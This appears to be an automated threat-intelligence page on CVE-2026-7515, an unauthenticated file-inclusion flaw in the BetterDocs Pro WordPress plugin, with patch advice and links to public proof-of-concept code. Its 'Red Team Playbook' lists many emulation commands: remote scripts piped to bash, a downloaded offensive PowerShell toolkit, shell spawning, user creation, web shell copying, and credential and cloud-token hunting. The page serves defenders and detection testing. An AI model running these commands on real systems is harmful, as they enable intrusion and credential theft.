CVE-2026-7515
Overview
This vulnerability is a Local File Inclusion (LFI) flaw in the BetterDocs Pro WordPress plugin, specifically affecting versions up to 3.8.0. The root cause lies in insufficient input validation of the `doc_style` parameter, which allows an attacker to manipulate file inclusion logic. The affected component is the file inclusion mechanism within the plugin that processes the `doc_style` parameter without proper sanitization, enabling arbitrary file inclusion on the server.
Vulnerability Description
The BetterDocs Pro plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 3.8.0 via the `doc_style` parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.
Impact
An attacker with no authentication or user interaction can exploit this vulnerability to execute arbitrary PHP code on the server. This enables bypassing access controls, unauthorized data access, and full system compromise if malicious PHP files are uploaded and included. The attack can lead to data breaches, server takeover, and lateral movement within the hosting environment, severely impacting business operations and data confidentiality.
Solution
Upgrade BetterDocs Pro to version 3.8.1 or later as recommended by the vendor. Detailed patch and update instructions are available on the official BetterDocs changelog at https://betterdocs.co/changelog/. No specific advisory ID is provided, but the vendor’s update addresses the file inclusion vulnerability by sanitizing the `doc_style` parameter input.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the BetterDocs Pro plugin for WordPress is characterized by a Local File Inclusion (LFI) flaw that affects versions up to and including 3.8.0. This vulnerability arises from improper handling of the `doc_style` parameter, which allows an attacker to manipulate the input in such a way that they can include arbitrary PHP files from the server's filesystem. The lack of adequate input validation and sanitization is the root cause of this issue, enabling unauthorized access to sensitive files and the execution of malicious PHP code. This flaw is particularly severe due to its high CVSS score of 9.8, indicating a critical risk to systems utilizing this plugin.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting unauthenticated users. An attacker can craft a malicious request that alters the `doc_style` parameter to point to sensitive files on the server, such as configuration files or other PHP scripts. Once the attacker successfully includes a file, they can execute arbitrary code, potentially leading to a full compromise of the server. For instance, if the attacker includes a PHP file that contains a web shell, they can gain persistent access to the server, allowing them to manipulate data, exfiltrate sensitive information, or pivot to other systems within the network.
The real-world impact of this vulnerability is significant, especially for organizations that rely on the BetterDocs Pro plugin for their WordPress sites. The ability to execute arbitrary PHP code can lead to severe consequences, including data breaches, loss of customer trust, and potential regulatory repercussions. Businesses may face financial losses due to downtime, remediation efforts, and reputational damage. Furthermore, the exploitation of this vulnerability could serve as a stepping stone for attackers to gain deeper access to the organization's infrastructure, leading to more extensive security incidents.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, it is crucial to update the BetterDocs Pro plugin to the latest version, which contains patches addressing this flaw. Regularly monitoring and applying updates to all plugins and themes is essential for maintaining a secure WordPress environment. Additionally, implementing a web application firewall (WAF) can help filter out malicious requests attempting to exploit this vulnerability. Organizations should also conduct regular security assessments, including vulnerability scans and penetration testing, to identify and remediate potential weaknesses in their systems.
In conclusion, the Local File Inclusion vulnerability in the BetterDocs Pro plugin poses a critical threat to WordPress sites, enabling unauthorized code execution and access to sensitive data. The potential for exploitation highlights the importance of maintaining up-to-date software and employing robust security measures. By prioritizing proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their digital assets against emerging threats.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-7515, coinciding with the emergence of new publicly available proof-of-concept exploits hosted on GitHub. Our telemetry indicates that these developments have broadened the exploit landscape, lowering the barrier for unauthenticated attackers to leverage the Local File Inclusion vulnerability in BetterDocs Pro. This shift significantly amplifies the risk of unauthorized code execution and sensitive data exposure on affected WordPress installations. The updated CVSS score of 9.8 reflects the critical severity, underscoring the urgent threat posed by these active exploitation tools. While the EPSS score remains relatively low, the doubling trend signals growing interest and potential for wider exploitation. For defenders, this evolution demands heightened vigilance as the availability of exploit code facilitates more opportunistic and automated attacks, increasing the likelihood of successful compromise in environments where patching is delayed or incomplete.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Polosss/By-Poloss..-..CVE-2026-7515-PoC
Unauthenticated Local File Inclusion
|
Polosss | 1 | 0 | 2026-06-18 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
izxci/CVE_2026_7515
CVE-2026-7515: BetterDocs Pro <= 3.8.0 - Unauthenticated Local File Inclusion TO RCE EXPLOİT
|
izxci | 0 | 0 | 2026-06-19 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Active exploitation confirmed — vendor: betterdocs, product: BetterDocs Pro
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-193 | PHP Remote File Inclusion |
47%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-7515 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/694b67d2-7d60-4764-a2c0-02698c331772?source=cve |
| betterdocs.co |
GitHub CVE
|
https://betterdocs.co/ |
| betterdocs.co |
GitHub CVE
|
https://betterdocs.co/changelog/ |